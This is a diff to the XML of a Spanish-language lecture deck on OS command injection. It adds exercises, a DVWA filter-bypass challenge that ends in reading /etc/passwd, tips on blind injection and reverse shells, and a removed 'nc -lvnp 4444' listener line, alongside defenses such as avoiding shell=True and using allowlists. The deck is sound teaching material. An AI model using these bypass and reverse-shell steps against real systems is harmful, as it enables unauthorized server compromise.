--- a/classes/parte-4-seguridad-de-aplicaciones-web/095-inyeccion-de-comandos-del-sistema-operativo/clase-095-presentacion.pptx
+++ b/classes/parte-4-seguridad-de-aplicaciones-web/095-inyeccion-de-comandos-del-sistema-operativo/clase-095-presentacion.pptx
@@ -17,6 +17,9 @@
     <p:sldId id="265" r:id="rId16"/>
     <p:sldId id="266" r:id="rId17"/>
     <p:sldId id="267" r:id="rId18"/>
+    <p:sldId id="268" r:id="rId19"/>
+    <p:sldId id="269" r:id="rId20"/>
+    <p:sldId id="270" r:id="rId21"/>
   </p:sldIdLst>
   <p:sldSz cx="9144000" cy="6858000" type="screen4x3"/>
   <p:notesSz cx="6858000" cy="9144000"/>
@@ -3198,7 +3201,7 @@
                   <a:srgbClr val="0B3D2E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>⚠️ Errores comunes</a:t>
+              <a:t>✍️ Ejercicios</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -3236,67 +3239,82 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>•  El separador se filtra — Nivel Medium bloquea ;/&amp;&amp;; prueba \</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  No hay salida — Inyección ciega; usa tiempo u OOB</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Reverse shell no conecta — Firewall/NAT del lab; revisa IP y puerto</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Comando no existe en Windows — Sintaxis distinta; usa comandos nativos</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Falso positivo por latencia — Repite la prueba de sleep varias veces</a:t>
+              <a:t>•  Enumera 5 metacaracteres distintos y en qué se diferencian al encadenar.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Confirma una inyección ciega solo con retardo temporal.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Adapta un payload de Linux a su equivalente en Windows (&amp;, %COMPUTERNAME% o %USERNAME%).</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Explica la diferencia entre command injection y argument injection.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Escribe la versión segura en Python usando subprocess con lista de argumentos (sin shell=True).</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Diseña una allowlist para un campo que solo debe aceptar una IP.</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -3347,7 +3365,7 @@
                   <a:srgbClr val="0B3D2E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>❓ Preguntas frecuentes</a:t>
+              <a:t>📝 Reto verificable</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -3385,82 +3403,22 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>•  ❓ ¿Por qué es tan grave?</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Porque ejecutar comandos suele equivaler a controlar el servidor (RCE), el peor escenario posible.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  ❓ ¿shell=True es el problema?</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  A menudo sí. Pasar input a un shell es la causa. Usa APIs que reciban argumentos como lista, sin intérprete de shell.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  ❓ ¿Escapar caracteres basta?</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Es frágil. Mejor evitar el shell por completo y validar con allowlists estrictas.</a:t>
+              <a:t>•  Consigue ejecución de comandos en DVWA nivel Medium (que filtra algunos caracteres) evadiendo el filtro, y demuestra el acceso listando /etc/passwd.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Criterio de aceptación: entregas el payload que evade el filtro, la evidencia de lectura de /etc/passwd y la corrección de código que eliminaría la vulnerabilidad.</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -3511,7 +3469,7 @@
                   <a:srgbClr val="0B3D2E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>🔗 Referencias</a:t>
+              <a:t>⚠️ Errores comunes</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -3549,6 +3507,319 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
+              <a:t>•  El separador se filtra — Nivel Medium bloquea ;/&amp;&amp;; prueba \</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  No hay salida — Inyección ciega; usa tiempo u OOB</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Reverse shell no conecta — Firewall/NAT del lab; revisa IP y puerto</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Comando no existe en Windows — Sintaxis distinta; usa comandos nativos</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Falso positivo por latencia — Repite la prueba de sleep varias veces</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide13.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr/>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="TextBox 1"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="457200" y="320040"/>
+            <a:ext cx="8229600" cy="822960"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr sz="2600" b="1">
+                <a:solidFill>
+                  <a:srgbClr val="0B3D2E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>❓ Preguntas frecuentes</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="TextBox 2"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="457200" y="1280160"/>
+            <a:ext cx="8229600" cy="4937760"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  ❓ ¿Por qué es tan grave?</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Porque ejecutar comandos suele equivaler a controlar el servidor (RCE), el peor escenario posible.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  ❓ ¿shell=True es el problema?</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  A menudo sí. Pasar input a un shell es la causa. Usa APIs que reciban argumentos como lista, sin intérprete de shell.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  ❓ ¿Escapar caracteres basta?</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Es frágil. Mejor evitar el shell por completo y validar con allowlists estrictas.</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide14.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr/>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="TextBox 1"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="457200" y="320040"/>
+            <a:ext cx="8229600" cy="822960"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr sz="2600" b="1">
+                <a:solidFill>
+                  <a:srgbClr val="0B3D2E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>🔗 Referencias</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="TextBox 2"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="457200" y="1280160"/>
+            <a:ext cx="8229600" cy="4937760"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
               <a:t>•  Stuttard &amp; Pinto, The Web Application Hacker's Handbook, cap. 9 (OS command injection).</a:t>
             </a:r>
           </a:p>
@@ -3584,6 +3855,81 @@
           </a:p>
         </p:txBody>
       </p:sp>
+    </p:spTree>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide15.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr/>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="TextBox 1"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="457200" y="274320"/>
+            <a:ext cx="8229600" cy="640080"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr sz="2200" b="1">
+                <a:solidFill>
+                  <a:srgbClr val="0B3D2E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>Diagrama de la clase</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="3" name="Picture 2" descr="493791f6c1934575.png"/>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId2"/>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="457200" y="3022092"/>
+            <a:ext cx="8229600" cy="1453896"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
     </p:spTree>
   </p:cSld>
   <p:clrMapOvr>
@@ -3668,7 +4014,7 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>•  Explotar la inyección de comandos del SO (OS command injection): cuando una aplicación pasa entrada del usuario a un shell del sistema, un atacante puede ejecutar comandos arbitrarios. Es una de las vulnerabilidades de mayor impacto porque suele derivar en ejecución remota de código (RCE).</a:t>
+              <a:t>•  Explotar la inyección de comandos del SO (OS command injection): cuando una aplicación pasa entrada del usuario a un shell del sistema, un atacante puede ejecutar comandos arbitrarios. Es una de las…</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4062,7 +4408,7 @@
                   <a:srgbClr val="0B3D2E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>📖 Definiciones y características</a:t>
+              <a:t>🧠 Explicación en profundidad</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4100,82 +4446,97 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>•  OS command injection: ejecución de comandos del sistema vía input no sanitizado. Característica: suele acabar en RCE.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Metacaracter de shell: símbolo que combina comandos (;, &amp;&amp;, |,   , $()). Característica: rompe el comando previsto.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Blind command injection: no hay output; se infiere por tiempo o interacción externa. Característica: se confirma con sleep o nslookup.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Reverse shell: la víctima conecta de vuelta al atacante. Característica: da control interactivo en el lab.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Argument injection: se inyectan flags a un binario, no comandos nuevos. Característica: más sutil pero explotable.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Allowlist: lista cerrada de valores permitidos. Característica: defensa robusta frente a blocklists.</a:t>
+              <a:t>•  La inyección de comandos del sistema operativo es de las vulnerabilidades más graves porque su</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  consecuencia directa es la ejecución de código en el servidor (RCE): el atacante deja de</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  manipular la aplicación y pasa a controlar la máquina que la aloja. Ocurre cuando la aplicación</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  toma entrada del usuario y la incorpora a un comando del sistema que ejecuta —por ejemplo,</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  una función que llama a ping, nslookup, convert o cualquier utilidad del sistema pasándole</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  un argumento que viene del usuario—. Si ese argumento no se controla, el atacante añade sus</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  propios comandos. Es la misma causa raíz que la SQLi —datos que cruzan a un intérprete— pero</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4226,7 +4587,7 @@
                   <a:srgbClr val="0B3D2E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>🧰 Herramientas y preparación</a:t>
+              <a:t>📖 Definiciones y características</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4264,52 +4625,82 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>•  DVWA (Command Injection) y PortSwigger labs de OS command injection.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Burp para editar peticiones.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  netcat para escuchar la reverse shell en tu propia máquina de laboratorio.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  nc -lvnp 4444</a:t>
+              <a:t>•  OS command injection: ejecución de comandos del sistema vía input no sanitizado. Característica: suele acabar en RCE.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Metacaracter de shell: símbolo que combina comandos (;, &amp;&amp;, |,   , $()). Característica: rompe el comando previsto.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Blind command injection: no hay output; se infiere por tiempo o interacción externa. Característica: se confirma con sleep o nslookup.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Reverse shell: la víctima conecta de vuelta al atacante. Característica: da control interactivo en el lab.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Argument injection: se inyectan flags a un binario, no comandos nuevos. Característica: más sutil pero explotable.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Allowlist: lista cerrada de valores permitidos. Característica: defensa robusta frente a blocklists.</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4360,7 +4751,7 @@
                   <a:srgbClr val="0B3D2E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>🧪 Laboratorio guiado</a:t>
+              <a:t>📔 Glosario</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4398,97 +4789,97 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
